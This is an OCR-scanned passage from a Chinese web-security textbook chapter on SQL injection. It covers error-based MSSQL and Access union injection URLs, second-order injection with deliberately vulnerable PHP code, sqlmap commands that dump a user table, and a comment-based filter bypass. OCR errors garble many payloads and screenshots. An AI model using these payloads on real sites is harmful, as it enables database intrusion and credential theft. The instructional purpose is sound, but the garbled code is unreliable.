从 查询 name 列 的 结果 中 获取 了 sec 数据 库 中 的 第 3 个 表 为 eims. Down 的 信息 ,如 图 2-84 
所 示 。 


局 Load URL [httpi//vww.ctfs-wiki.com/News.asp?SortiD=1 &ltamID-46 and 0 «(select top 1 name from sec.dbo.syscbjects where xtype-"U' and name not in ('eims Cacoprov'eims CaseSort?) 
Ñ  SplitUR. 
回 Execute 


C Enable Post data C] Enable Referrer 


Microsoft OLE DB Provider for SOL Server $i 80040007" 
在 将 nvarchar (Ñ 'eins Dow 转换 万 数据 类 型 int MAMo 


/eins. cns, 3. 8/Conig.asp» f] 23 


2-84 返回 eims Down 表 报 错 信息 
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3) 获取 表 中 的 列 名 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News.asp? SortID- l&ItemID- 46 and 0< (select top 1 
name from sec.dbo.syscolumns where id- (select id from sec.dbo.sysobjects 
where xtype-'U' and name-'eims User')) 


从 eims User 表 中 获取 其 id, 然 后 从 syscolumns 中 利用 该 id 查询 第 一 个 列 名 ,获取 
eims User 表 的 第 一 个 列 名 ItemID ,如 图 2-85 所 示 o 


4E Load URL [http;//www.ctis-wik.com/News.asp?SortID- 1&ltemID 46 and 0 «(select top 1 name from sec.dbo.syscolumns where id=(select id from 
|j splitUmL  |secdbosysobjects where xtype-'U and name-'eims User) 


®© Execute 


C Enable Post data [ ] Enable Referrer 


Microsoft OLE DB Provider for SQL Server WR '80040e07" 
在 将 nvarchar (Ñ 'IteaID' 转换 成 数据 类 型 int 时 失败 。 


/eims_cms_3.5/Config. asp» 行 23 


图 2-85 返回 ItemID 列 报错 信息 


输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News.asp? SortID- l&ItemID- 46 and 0< (select top 1 
name from sec.dbo.syscolumns where id= (select id from sec.dbo.sysobjects 
where xtype- 'U' and name-'eims User') and name not in ('ItemID')) 


从 eims_ User 表 中 获取 其 id, 然 后 从 syscolumns 中 利用 该 id 查询 第 二 个 列 名 ,获取 
eims User 表 的 第 二 个 列 名 SortID, 如 图 2-86 所 示 。 


4) LosdURL  [http//www.ctfs-wiki.com/News.asp?SortID - 1&ltemID -46 and 0<(select top 1 name from sec.dbo.syscolumns where id- (select id from 
J| SpituRL |secdbosysobjects where xtypez'U' and name-'eims User) and name not in (ItemlD?) 


®© Beaute 


C Enable Post data [] Enable Referrer 


Microsoft OLE DB Provider for SQL Server Mi '80040e07' 
在 将 nvarchar B 'SortID' 转换 成 数据 类 型 int 时 失败 。 


/eins_cms_3.5/Config.asp, 行 23 


2-86 返回 SortID 列 报错 信息 


4) 获取 列 中 的 数据 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News .asp?SortID=1&ItemID=46 and 0< (select top 1 
iteml from sec.dbo.eims User) 


从 eims User 表 中 获取 iteml 列 的 数据 admin, 如 图 2-87 所 示 。 
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4E) LoadURL |http;//www.ctfs-wiki.com/News.asp?SortID - 1&ltemID-46 and 0<(select top 1 item1 from sec.dbo.eims_User) 
Ü Split URL 
四 


Execute 


Enable Post data Enable Referrer 


Microsoft OLE DB Provider for SQL Server 措 误 '80040e07' 
在 将 nvarchar 值 “admin” 转 换 成 数据 类 型 int 时 失败 。 


/eims cns 3. 5/Config.asp, 行 23 


图 2-87 返回 iteml 列 的 数据 信息 


2.7 Access 注入 


Access 数据 库 是 由 微软 公司 发 布 的 关系 数据 库 管 理 系统 。 
它 结 合 了 Microsoft Jet Database Engine 和 图 形 用 户 界面 两 大 特 
点 ,是 Microsoft Office 的 组 件 之 一 。 图 2-88 是 Access 的 标识 。 

Access 以 专用 格式 将 数据 存储 在 基于 Access Jet 的 数据 库 
引擎 里 。 它 还 可 以 直接 导入 或 者 链接 数据 (这 些 数 据 存储 在 其 他 
图 2-88 Access 的 标识 应 用 程序 和 数据 库 中 ) 。 


2.7.1 Access 基础 知识 


1. Access 数据 库 的 系统 结构 

常见 的 Access 数据 库 文件 的 扩展 名 是 mdb 和 accdb。Access 数据 库 在 结构 上 主要 
包括 表 、 查 询 、 窗 体 、 报 表 、 数 据 访 问 页 A ,模块 。 

表 是 数据 库 中 用 来 存储 数据 的 对 象 ,是 数据 库 的 核心 和 基础 。 表 由 表 结 构 和 表 内 容 
(记录 ) 两 部 分 组 成 。 在 对 表 进 行 操作 时 ,是 对 表 结 构 和 表 内 容 分 别 进行 操作 的 。 表 结构 
包括 表 名 和 字段 属性 两 部 分 。 


2. Access 数据 库 的 系统 表 

Access 数据 库 的 系统 表 包 括 MSysAccessObjects、MSysAccessXML、MSysACEs、 
MSysNameMap, MSysNavPaneGroupCategories, MSysNavPaneGroups, MSysNavPane- 
ObjectIDs, MSysNavPaneGroupToObjects , MSysObjects , MSysQueries, MSysRelationships., 

MSysObjects 中 包含 了 所 有 的 数据 库 对 象 ,如 图 2-89 所 示 。 在 默认 情况 下 ,不 允许 
访问 数据 库 的 系统 表 。 


272 Access 爆破 法 注入 


1. Access 爆破 法 注入 payload 
Access 爆破 法 注入 payload 如 下 : 
(1) 猜测 数据 库 中 的 表 名 。 例 如 : 


96 


E 第 2 章 SQL 注入 漏洞 me 


MSysAccessXML 
T MSysACEs 

3 MSysObjects 

3 MSysQueries 

3 MSysRelationships 
News 

OrderList 


orders 


MSysObjects 包含 了 所 有 的 数据 库 对 象 


http://www.ctfs- wiki. com/NewsInfo.asp?Id=130 and exists (select * from 
TableName) 


(2) 猜测 表 中 的 列 名 。 例 如 : 


http://www.ctfs-wiki.com/NewsInfo.asp? Id-130 and exists (select ColumnName 
from TableName) 


C3) 判断 列 数 。 例 如 : 


http://www.ctfs-wiki.com/NewsInfo.asp? Id-130 order by 7 


(4) 查看 报错 点 。 例 如 : 


http://www.ctfs-wiki.com/NewsInfo.asp? Id-130 and 1-2 union select 1,2,3,4, 
5,6,7 from TableName 


(5) 获取 数据 。 例 如 


http://www.ctfs - wiki. com/NewsInfo. asp? Id - 130 and 1=2 union select 1, 
ColumnNamel,3,4,ColumnName2,6,7 from TableName 


2. Access 爆破 法 注入 步骤 

1) 猜测 数据 库 中 的 表 

利用 and exists (select * from TableName) 猜 测 是 否 存在 TableName 表 。 如 果 页 
面 正常 返回 ,说明 存在 TableName 表 ; 如 果 页 面 不 正常 返回 ,说明 不 存在 TableName 表 。 

输入 以 下 测试 语句 : 


http://www.ctfs- wiki. com/NewsInfo. asp? Id=130 and exists (select * from 
manage) 


猜测 是 否 存在 manage 表 , 页 面 正常 返回 ,说 明 存在 manage 表 , 如 图 2-90 所 示 。 
2) 猜测 表 中 的 列 名 
利用 and exists (select ColumnName from TableName) 猜测 TableName 表 中 是 否 


97 


=m Web 安全 原理 分 析 与 实践 me 


http-//www.ctfs-wiki.com/NewsiInfo.asp?Id=130 and exists (select * from manage] Ë 


W wi i ES 
新 闻 中 心 》 正 文 
中 国 工程 机 械 服 引 外 次 并购 三 大 诱 右 
发 布 日 期 : [2006-12-7] ” 共 阅 [162] 次 
一 流 的 
,一 THER SEGA ELTE ERAI 
--- M 不 少 海外 大 名 一 直 在 姜 莫 我 国 经 济 持续 多 年 的 高 成 长 ， 也 很 想 入 来 分 享 人 民 币 长 远 升值 的 大 蛋 填 


不 得 门 而 入 ， 但 现在 随 着 政策 逐步 放松 ,G 股 对 外 国 战略 投资 者 的 开放 , 无 疑 令 外 国 机 构 投资 者 | 
对 他 们 更 是 一 场 盛 宾 , 因为 全 流通 之 后 改变 了 一 股 独 大 的 现象 ,外资 就 可 以 进来 通过 参股 和 控 提 
和 人 民 币 升值 的 成 果 。 多 项 信息 都 表明 , 海外 机 构 对 进入 国内 A 股 市 场 已 经 急 不 及 待 ， 近日 相继 | 
v Th^ , "对 冲 基金 虎视 中 国 "以 及 外 资 收购 国内 公司 "价格 不 是 问题 "等 媒体 报道 。 两 会 期 间 首 钢 集 | 
TRA, ，" 谁 有 钱 , 花 300 亿 就 衣 买 到 中 国 最 大 的 钢铁 企业 (宝钢 )。 "要 知道 中 国 为 宝钢 的 投资 超过 | 
M 严重 低估 的 资产 以 及 成 为 外 资 战略 做 多 A 股 的 首选 。 


工程 机 械 外 资 并 购 率先 试 水 


图 2-90 页 面 正 常 返回 说 明 存在 manage 表 


存在 ColumnName 列 。 如 果 页 面 正 常 返回 ,说 明 存 在 ColumnName 列 ; 如果 页 面 不 正常 
返回 ,说 明 ColumnName 列 不 存在 。 
输入 以 下 测试 语句 : 


http://www.ctfs- wiki.com/NewsInfo.asp? Id- 130 and exists (select username 
from manage) 


猜测 manage 表 中 是 否 存在 username $l] ,页 面 正常 返回 ,说 明 存 在 username 列 , 如 图 2-91 
所 示 。 


http://www.ctfs-wiki.com/Newslnfo.asp?ld- 130 and exists (select username from manage) 


中 国 工程 机 械 骸 引 外资 并 购 三 大 诱 恶 


发 布 日 期 : [2006-12-7] 。” 共 阅 [164] 次 
升值 盛 宾 催促 外 资 并 购 虎 视 A 股 


k--- M FOBAE- B FS CERES HS R S SEDUIS EAE , UB RAO SLA E ICESTHÉRO A ERE ,但 以 

不 得 门 而 入 ,但 现在 随 着 政策 逐步 放松 ，G 股 对 外 国 战略 投资 者 的 开放 , ZCEES ENS 5 Ei 

对 他 们 更 是 一 塌 盛 宾 ,因为 全 流通 之 后 改变 了 一 股 独 大 的 现象 ,外资 就 可 以 进来 通过 参股 和 控股 从 而 分 

Eee 和 人 民 币 升 值 的 成 果 。 多 项 信息 都 表明 ,海外 机 构 对 进入 国内 A 股市 场 已 经 急 不 及 待 ， 近 日 相继 有 "海外 : 
~ 


Thi” "对冲 基金 虎视 中 国 "以 及 外 资 收购 国内 公司 "价格 不 是 问题 "等 媒体 报道 。 两 会 期 间 首 钢 集 团 董 事 长 
惊人 ，“ 谁 有 镜 ， 花 300 亿 就 能 买 到 中 国 最 大 的 钢铁 企业 (宝钢 )。“ 和 要 知道 中 国 为 宝钢 的 投资 超过 千 亿 元 
Bec 严重 低估 的 资产 以 及 成 为 外 资 战略 做 多 A 股 的 首选 。 


Ea 工程 机 械 外 资 并 购 率 先 试 水 


而 在 这 个 国际 并 购 大 短 逐 廊 中 原 的 背景 下 ,国内 具有 庚 价 的 成 本 优势 、 较 高 的 快速 增长 性 的 工程 机 械 行 : 
购 巨 头 的 角逐 战场 。 全 球 最 大 的 机 械 设备 制造 商 -- 美 国 卡特 彼 勤 公司 正在 中 国 展开 一 场 并 购 扩张 风暴 ， 
龙头 企业 几 手 者 被 列 入 其 并 购 计划 中 ; 对 于 卡特 彼 勤 发 起 的 这 一 并 购 风 是 ,业界 人 士 认 为 其 "扩张 野心 


图 2-91 页 面 正常 返回 说 明 存 在 username 列 
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3) 判断 列 数 

Access 数据 库 支 持 联合 查询 ,可 以 通过 联合 查询 获取 数据 。 联 合 查询 要 满足 列 数 相 
同 的 要 求 ,所 以 要 先 通过 order by 判断 列 数 。 

输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/NewsInfo.asp? Id-130 order by 7 


页 面 正常 返回 ,说 明 至 少 存在 7 列 , 如 图 2-92 所 示 。 


http://www.ctfs-wiki.com/NewsiInfo.asp?Id=130 order by 7 
C Enable Post data [ ] Enable Referrer 
s — = 
less. "PBULGULMRSLARUHB — Xi 
发 布 日 期 : [2006-12-7] ` 共 阅 [168] 次 
升值 怀 窒 催 促 外 资 并 购 虎视 A 股 
B. H TORIA- BURERERE YHSR t mr. , IBGURORO SEA RUBIIRTHBIS A UE, BUH 
AUA, ERGCBERSNGEEHUS , GERUHBIRIEEER ISTE , ERESUHRILOIEEROURURC 
= XbDES ESSE. 因为 全 流通 之 后 改变 了 一 股 独 大 的 现象 ,外 资 就 可 以 进来 通过 参股 和 控股 从 而 分 避 
和 人 民 币 升值 的 成 果 。 多 项 信息 者 表明 ,海外 机 构 对 进入 国内 A 股市 场 已 经 急 不 及 待 ， 近 日 相继 有 "海外 
M 市 ”对 冲 基金 席 视 中 国 "以 及 外 次 收购 国内 公司 价格 不 是 问题 "等 媒 体 报道 ， 两 会 期 间 首钢 集团 昔 事 长 
惊人 ，" 谁 有 钱 , 花 300 亿 就 能 买 到 中 国 最 大 的 钢铁 企业 (宝钢 ) “要 知道 中 国 为 宝钢 的 投资 超过 千 亿 元 啊 
Ë ~ PR66069 B OSA RUARMES ABH, 
ET 工程 机 械 外 资 并 购 率先 试 水 
图 2-92 ”页面 正常 返回 说 明 至 少 存在 7 列 
输入 以 下 测试 语句 ， 


http://www.ctfs-wiki.com/NewsInfo.asp? Id-130 order by 8 


页 面 不 正常 返回 ,说 明 小 于 8 列 ,如 图 2-93 所 示 。 综 上 所 述 ,存在 7 列 。 


http://www.ctís-wiki.com/NewsInfo.asp?ld-130 order by 


C Enable Post data [ ] Enable Referrer 
ramas 当前 位 置 :首页 
新 闻 中 心 》 正 文 

t: 发 布 日 期 : [] 。” 共 阅 [] 次 

k. 扬州 恒 旺 五 金 机 械 有 限 公司 

p- E BHES ) 


ef H: ”江苏 省 扬州 市 江 阳 工业 园 ( 看 岗 路 与 司徒 庙 路 交叉 路 口 ) 
eE @: 225008 


em® Æ: 086-514-7839088 5108518 


ett M: 086-514-78302RR 


2-93 页 面 不 正常 返回 说 明 小 于 8 列 
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4) 查看 报错 点 

与 MySQL 数据 库 不 一 样 ,Access 数据 库 的 查询 命令 必须 写 为 select 1,2,3,4,5,6,7 
from tablename, 其 中 ,from 不 能 省 略 ,tablename 必须 真实 存在 。 

输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/NewsInfo.asp? Id- 130 and 1-2 union select 1,2,3,4, 
5,6,7 from manage 


页 面 返回 2 和 5, 如 图 2-94 所 示 ,说 明 2 和 5 都 是 报错 点 。 


http://www.ctfs-wiki.com/NewslInfo.asp?ld- 130 and 1=2 union select 1,2,3,4,5,6,7 from manage 


Enable Post data Enable Referrer 


ILLI 当前 位 置 : 首 列 
新 闻 中 心 》 正 文 


2 


发 布 日 期 : [5] 。” 共 阅 [5] 次 


: “一 流 的 

图 2-94 返回 报错 点 2 和 5 
5) 获取 数据 
输入 以 下 测试 语句 : 


http://www.ctfs - wiki. com/NewsInfo. asp? Id - 130 and 1=2 union select 1, 
username,3,4,password,6,7 from manage 


最 终 获取 manage 表 中 username 字段 中 的 值 是 admin, password 的 值 是 bc195e754558be8e, 
如 图 2-95 Biz. bcl95e754558be8e 这 个 值 是 经 过 md5 加 密 后 的 值 ,经 过 解密 后 可 以 得 到 明 
文 密码 。 


http://www.ctfs-wiki.com/Newslnfo.asp?ld- 130 and 1=2 union select 1,username,3,4 password,6,7 from mana: 


Enable Post data Enable Referrer 
[ILI 当前 位 置 : 首 ? 
新 闻 p b y 正文 


发 布 日 期 : [bc195e754558be8e] ”共同 [5] 次 


ka 【打印 此 页 】 DEE 


图 2-95 返回 admin 和 password 的 值 
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I 二 次 注入 


二 次 注入 是 SQL 注入 的 一 种 形式 ,是 在 Web 应 用 程序 中 经 常 出 现 的 注入 类 型 。 

二 次 注入 的 原理 是 : 第 一 次 在 参数 中 输入 恶意 数据 的 时 候 ,由 于 存在 addslashes 等 
函数 的 过 滤 ,会 将 特殊 字符 添加 \ 进 行 转 义 ,但 是 转 义 字符 \ 本 身 并 不 会 存 和 数据库。 这 
样 ,下 一 次 进行 查询 时 ,如 果 没 有 过 滤 , 直 接 从 数据 库 中 取出 恶意 数据 并 执行 ,就 造成 了 


SQL 注入 ,如 图 2-96 所 示 。 
CNN 
数据 库 


mass KAR HHN 
数据 1 拼接 

SQL 注入 触发 sisQi ami. A A 

中 行 PP uda 


图 2-96 二 次 注入 产生 的 过 程 


2.8.1 二 次 注入 示例 代码 分 析 


图 2-97 所 示 的 网 站 存在 二 次 注入 漏洞 。 在 注册 用 户 的 界面 ,网 站 通过 addslashes PR 
数 将 用 户 名 、 密 码 .邮箱 进行 了 特殊 字符 转 义 , 所 以 无 法 通过 注册 功能 进行 SQL 注入 。 但 
是 ,网 站 有 密码 找 回 功能 。 密 码 找 回 的 过 程 是 : 用 户 输入 邮箱 信息 ;网 站 查询 邮箱 信息 ， 
然后 从 数据 库 中 获取 邮箱 对 应 的 用 户 名 ,最 后 将 用 户 名 信息 拼接 到 SQL 语句 中 查询 。 这 
样 ,在 用 户 名 处 就 存在 二 次 注 和 漏洞 。 


注册 


通过 邮箱 找 回 密码 


请 注册 输入 信息 


图 2-97 二 次 注入 漏洞 示例 网 站 


1. 注册 代码 
网 站 注册 代码 如 下 : 
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$username=addslashes($ POST['username']); 

$password-addslashes($ POST['password']); 

S$email-addslashes ($ POST['email']); 

$sql-"INSERT INTO "users? (^username' ," password, ,'email') VALUES ('$username', 
'$password', 'S$email');"; 

$row-mysql query ($sql); 


在 注册 代码 中 ,通过 addslashes 函数 将 用 户 名 、 密 码 .邮箱 进行 了 特殊 字符 转 义 ,所 以 


无 法 通过 注册 功能 进行 SQL 注入 。 


2. 密码 找 回 代码 
网 站 密码 找 回 代码 如 下 : 


$email-addslashes ($ POST['email']); 
$sql-"select * from users where email-'($email)'"; 
$row-mysql query ($sq1) ; 
if ($row){ 

$rows=mysql_fetch_array ($row); 
$username-$rows['username']; 
$sqlpass-"select * from users where username- '$username'"; 


) 


找 回 密码 时 ,用 户 输入 邮箱 信息 ,网 站 从 数据 库 中 获取 邮箱 对 应 的 用 户 名 ,从 数据 库 


中 通过 查询 获取 的 用 户 名 没有 经 过 过 滤 , 然 后 将 用 户 名 信息 拼接 到 SQL 语句 中 查询 ,这 
样 就 造成 了 二 次 注入 漏洞 。 


2.8.2 二 次 注入 漏洞 利用 过 程 


1. 注册 用 户 时 二 次 注入 
经 过 上 述 代码 分 析 , 用 户 名 处 存在 二 次 注入 漏洞 。 注 册 用 户 时 ,在 用 户 名 处 输入 SQL 


注入 的 payload: ctfs' or updatexml(1, concat(Ox7e, (version) ,0) # ,任意 输入 一 个 密码 (如 
123456) ,任意 输入 一 个 邮箱 (如 ctfs@ctfs. com) , 单 击 “ 注 册 ” 按 钮 进行 注册 ,如 图 2-98 所 示 。 
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MYSQL Second order SQLI 


用 户 注册 


用 户 名 cifs’ or updatexmi(1,concat(0x7e, 
zg ee 
邮箱 ctts@ctts com 


Eoi i-o] 


图 2-98 注册 用 户 
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注册 成 功 后 ,会 输出 执行 的 SQL 语句 ,发 现 单 引 号 已 经 被 转 义 ,如 图 2-99 所 示 。 


Ea 
通过 邮箱 找 回 客 码 


INSERT INTO "users; Cusername' password" ,emair) VALUES ('ctfsV or updatexmi(1,concat(0x7e, 
(version())).0)#', 123456", 'ctfs@ctts com'); 


图 2-99 单 引号 被 转 义 


通过 数据 库 连 接 工具 查询 数据 库 , 发 现存 人 数据 库 的 用 户 名 中 的 单 引号 并 没有 被 转 
义 , 如 图 2-100 所 示 。 


id ^ username password email 
1 admin admin adminGctfs.com 
8 ctfs' or updatexml(1,concat(0x7e,(version0)),0)# 123456 ctfs@ctfs.com 


图 2-100 存 人 数据 库 的 用 户 名 中 的 单 引 号 没有 被 转 义 


2. 密码 找 回 时 二 次 注入 
通过 邮箱 找 回 密码 的 功能 输入 邮箱 ,如 图 2-101 所 示 。 


MYSQL Second order SQLI 


密码 找 回 


请 输入 邮箱 ctts@ctts com 


返回 


图 2-101 输入 邮箱 


单 击 OK 按钮 后 , SQL 语句 拼接 了 含有 恶意 攻击 语句 的 用 户 名 ,服务 器 端 执行 了 
SQL 语句 select * from users where username = 'ctfs' or updatexml(1, concat (Ox7e, 


CversionO)) ,0) # ,通过 SQL 二 次 注入 获取 了 数据 库 的 版 本 信息 ,如 图 2-102 所 示 。 


MYSQL Second order SQLI 
请 输入 邮箱 [ok] 


返回 


elect * trom users where username='ctfs' or updatexmi(1,concat(Ox7e. (version())).0) XPATH syntax error|`-5 1 73' 


图 2-102 获取 了 数据 库 版 本 信息 
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_ 29 自动 化 SQL 注入 工具 sqlmap — 


sqlmap 是 一 个 自动 化 的 SQL 注入 工具 ,其 主要 功能 是 发 现 并 利用 给 定 的 URL 的 
SQL 注入 漏洞 。 目 前 它 支 持 的 数据 库 有 MySQL, Oracle, PostgreSQL, Microsoft SQL 
Server, Microsoft Access IJBM DB2,SQLite, Firebird, Sybase 和 SAP MaxDB. 


2.9.1 sqlmap 基础 


sqlmap 支持 以 下 5 种 注入 模式 : 

CD 基于 布尔 的 盲 注 。 可 以 根据 返回 页 面 判断 条 件 真 假 的 注入 。 

(2) 基于 时 间 的 盲 注 。 不 能 根据 页 面 返回 内 容 判 断 任何 信息 ,而 是 用 条 件 语句 查看 
时 间 延 迟 语句 是 否 执行 来 判断 。 

G) 基于 报错 注入。 即 页 面 会 返回 错误 信息 ,或 者 把 注入 语句 的 结果 直接 返回 到 页 
面 中 。 

(4) 联合 查询 注入 。 可 以 使 用 union 的 情况 下 的 注入 。 

(5) 堆 查 询 注入 。 可 以 同时 执行 多 条 语句 的 情况 下 的 注入 。 

sqlmap 支持 以 下 7 种 显示 等 级 : 

。 等 级 0: 只 显示 Python 错误 以 及 严重 问题 的 信息 。 

° 等 级 1: 在 显示 以 上 信息 的 同时 显示 基本 信息 和 警告 信息 (默认 )。 

。 等 级 2: 在 显示 以 上 信息 的 同时 显示 debug 信息 。 

° 等 级 3: 在 显示 以 上 信息 的 同时 显示 注入 的 payload. 

。 等 级 4: 在 显示 以 上 信息 的 同时 显示 HTTP 请 求 。 

。 等 级 5: 在 显示 以 上 信息 的 同时 显示 HTTP 响应 头 。 

。 等 级 6: 在 显示 以 上 信息 的 同时 显示 HTTP 响应 页 面 。 

sqlmap 常用 参数 如 下 : 

(D -u 或 者 -url ,指定 注 入 目标 URL。 例 如 : 


sqlmap -u http://ip/index.php? id-1 

(2) 一 dbms, 指 定数 据 库 。 例 如 : 

sqlmap -u http://ip/index. php?id-1 --dbms=mysql 
(3) 一 0s ,指定 操作 系统 。 例 如 : 

sqlmap -u http://ip/index.php? id-1 --os=Windows 


(4) 一 flush-session, 刷 新 缓存 。 例 如 : 
sqlmap -u http://ip/index.php? id-1 --flush-session 
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(5) 一 proxy, 指 定 代理 。 例 如 : 


(6) 一 user-agent, 指 定 user-agent 信息 。 例 如 : 


(7) 一 data, 数 据 以 POST 方式 提交 。 例 如 : 


2.9.2 sqlmap 注入 过 程 


1. sqlmap 注入 过 程 payload 
sqlmap 注入 过 程 payload 如 下 : 
(1) 列 出 所 有 的 数据 库 。 例 如 : 


(2) 列 出 当前 数据 库 。 例 如 : 


(3) 列 出 数据 库 中 所 有 的 表 。 例 如 : 


(4) 列 出 表 中 的 所 有 列 。 例 如 : 


(5) 获取 列 中 的 数据 。 例 如 : 


2. sqlmap 注入 示例 

用 sqlmap 对 http: //192. 168. 91. 142/sqli/01. php?id— 1 进行 自动 化 注入 。 
1) 列 出 当前 数据 库 

输入 以 下 测试 语句 : 


mum 105 um 
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获取 当前 的 数据 库 ctfswiki, 如 图 2-103 所 示 。 


[bython sqlmap.py -u http://192.168.91.142/sqli/01.php?id-l --current-db 


l (1.0-dev-nongit-20150907) 


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual 
lconsent is illegal. It is the end user's responsibility to obey all applicable 
llocal, state and federal laws. Developers assume no liability and are not 
lresponsible for any misuse or damage caused by this program 

[20:53:20] [INFO] the back-end DBMS is MySQL 

web server operating system: Linux CentOS 6.5 

web application technology: Apache 2.2.15, PHP 5.2.17 

lback-end DBMS: MySQL 5.0 

[20:53:20] [INFO] fetching current database 

[20:53:20] [WARNING] something went wrong with full UNION technique (could be 
because of limitation on retrieved number of entries) 

[20:53:20] [INFO] retrieved: ctfswiki 

[current database: 'ctfswiki' 

[20:53:20] [INFO] fetched data logged to text files under 

|C: NUsersWalkN.sqlmapNoutputM192.168.91.142" 


图 2-103 获取 当前 的 数据 库 ctfswiki 


2) 列 出 ctfswiki 数据库 所 有 的 表 
输入 以 下 测试 语句 : 


Sqlmap -uhttp://192.168.91.142/sqli/01.php?id-1 -D "ctfswiki" --tables 


获取 user 和 xss 表 , 如 图 2-104 所 示 。 


python sqlmap.py -u http://192.168.91.142/sqli/01.php?id=1 -D "ctfswiki" --tables 


Type: UNION query 
Title: Generic UNION query (NULL) - 3 columns 
Payload: id=1 UNION ALL SELECT 
NULL, CONCAT (0x716b707671, 0x597143476b5045664c67, 0x7178706b71) , NULL-- 
[20:55:53] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux CentOS 6.5 
|web application technology: Apache 2.2.15, PHP 5.2.17 
lback-end DBMS: MySQL 5.0 
[20:55:53] [INFO] fetching tables for database: 'ctfswiki" 
[20:55:53] [WARNING] something went wrong with full UNION technique (could be 
because of limitation on retrieved number of entries). Falling back to partial 
[UNION technique 
[20:55:53] [WARNING] the SQL query provided does not return any output 
[20:55:53] [INFO] the SQL query used returns 2 entries 
[20:55:53] [INFO] retrieved: user 
[20:55:53] [INFO] retrieved: xss 
Database: ctfswiki 
[2 tables] 


1 xss | 


[20:55:53] [INFO] fetched data logged to text files under 
Ic: NUsersWalkN.sqlmapVoutputV192.168.91.142" 


Ed 2-104 获取 user 和 xss 表 
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3) 列 出 ctfswiki 数 据 库 的 user 表 中 的 所 有 列 
输入 以 下 测试 语句 : 


sqlmap -uhttp://192.168.91.142/sq1i/01.php?id-1 -D "ctfswiki" -T "user" -- 
columns 


获取 id username, password 3 列 ,如 图 2-105 所 示 。 


lsalmap.py -u http://192.168.91.142/sql1i/01.php?id-1 -D "ctfswiki" -T "user" 


[--columns 


Type: UNION query 

Title: Generic UNION query (NULL) - 3 columns 

Payload: id-1 UNION ALL SELECT 

NULL, CONCAT (0x716b707671,0x597143476b5045664c67,0x7178706b71),NULL-- 


[20:57:44] [INFO] the back-end DBMS is MySQL 

Web server operating system: Linux CentOS 6.5 

[Web application technology: Apache 2.2.15, PHP 5.2.17 

lback-end DBMS: MySQL 5.0 

[20:57:44] [INFO] fetching columns for table 'user' in database 'ctfswiki' 

[20:57:45] [WARNING] something went wrong with full UNION technique (could be 
ecause of limitation on retrieved number of entries). Falling back to partial 
ION technique 

[20:57:45] [WARNING] the SQL query provided does not return any output 

[20:57:45] [INFO] the SQL query used returns 3 entries 

[20:57:45] [INFO] retrieved: id 

[20:57:45] [INFO] retrieved: int(3) 

[20:57:45] [INFO] retrieved: username 

[20:57:45] [INFO] retrieved: varchar(20) 

[20:57:45] [INFO] retrieved: password 

[20:57:45] [INFO] retrieved: varchar(20) 

Database: ctfswiki 

[Table: user 

[3 columns] 


| id int(3) I 
1 password | varchar(20) | 
| username | varchar(20) | 
 — 4------------- * 


[20:57:45] [INFO] fetched data logged to text files under 
[c: NUsersWalkN.sqlmapNoutputVM192.168.91.142* 


图 2-105 获取 id username, password 3 列 


4) 列 出 ctfswiki 数据 库 user 表 中 id, username, password 3 列 的 数据 
输入 以 下 测试 语句 : 


Sqlmap-u http://192.168.91.142/sqli/01.php?id=1 -D "ctfswiki" -T "user" -C 
"id,username,password" --dump 


获取 user 表 中 id, username, password 3 列 的 数据 : 1. userl,passl 等 ,如 图 2-106 
所 示 。 
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sqlmap.py -u http://192.168.91.142/sgli/0l.php?id-1 -D "ctfswiki" -T "user" -C 


"id username, password" --dump 


Type: error-based 
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausi 
Payload: id-1 AND (SELECT 7349 FROM(SELECT 
COUNT (*) , CONCAT (0x716b707671, (SELECT 
(ELT (7349-7349,1)) ) ,0x7178706b71, FLOOR (RAND (0) *2) ) x FROM 
INFORMATION SCHEMA.CHARACTER SETS GROUP BY x)a) 

Database: ctfswiki 

Table: user 


[8 entries] 

[e -———--------- — + 
| id | username | password | 
|= k = sss 4---------- + 
1 1 | userl | passi I 
1 2 | user2 I pass2 1 
1 3 | user3 | pass3 I 
1 4 | user4 1 pass4 I 
| 5 | user5 | pass5 I 
| 6 luseré | passé | 
17 | user? | pass? | 
| 8 | user8 | pass8 I 
It----£---------- 4---------- + 


[20:59:44] [WARNING] table 'ctfswiki.`user`' dumped to CSV file 
'C:NUsersWalkN.sqlmapVoutputV192.168. 91. 142 VdumpVctfswikiVuser-f3649c95.csv 
[20:59:44] [INFO] fetched data logged to text files under 

c: NUsers Walk. sqlmapVoutputM192.168.91.142" 


图 2-106 获取 id, username, password 3 列 的 数据 


2.10 SQL 注入 绕 过 


应 用 程序 开发 人 员 为 了 防止 出 现 SQL 注入 漏洞 ,在 进行 程序 开发 的 过 程 中 会 通过 关 
键 字 过 滤 的 方式 对 常见 的 SQL 注入 的 payload 进行 过 滤 ,使 攻击 者 无 法 进行 SQL 注入 。 
由 于 程序 员 的 水 平 及 经 验 参 差 不 齐 ,相当 大 一 部 分 程序 员 在 编写 的 代码 中 存在 过 滤 方 式 
缺陷 ,攻击 者 就 可 以 通过 编码 .大 小 写 混 写 、 等 价 函 数 特 换 等 多 种 方式 绕 过 SQL 注入 


2404 空格 过 滤 绕 过 


根据 应 用 程序 的 过 滤 规 则 ,会 将 空格 加 入 黑 名 单 ,但 是 空格 存在 多 种 绕 过 方式 ,常见 
的 包括 用 /**/、 制 表 符 、 换 行 符 、 括 号 ` 反 引号 来 代替 空格 。 


1. 漏洞 示例 代码 
漏洞 示例 代码 如 下 : 


if (preg match('/ /', $ GET["id"])) ( 
die("ERROR"); 
}else{ 
$id=$_GET['id']; 
$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1"; 
$result=mysql_query ($sq1); 
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在 以 上 代码 中 ,通过 preg_match 对 GET 型 id 参数 进行 了 过 滤 , 如 果 存 在 空格 ,会 结 
东 运 行 ,并 且 输出 ERROR. 


2. /xx/ 绕 过 
MySQL 数据 库 中 可 以 用 /**/( 注 释 符 ) 来 代替 空格 ,将 空格 用 注释 符 代替 后 ,SQL 语 
句 就 可 以 正常 运行 。 例 如 


mysql»select/**/1,2,database(); 


*---4---4------ * 
|1 |2 | database() | 
+---+---+------ + 
|1 |2 | ctfswiki | 
